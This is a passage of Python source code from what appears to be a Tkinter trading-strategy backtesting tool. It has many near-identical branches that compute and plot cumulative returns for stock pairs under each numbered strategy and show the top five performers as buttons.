canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(99):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(111):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(222):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(333):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(444):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(555):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(666):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(777):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(888):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(999):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(1111):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(2222):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(3333):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(4444):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(5555):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(6666):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(7777):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(8888):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
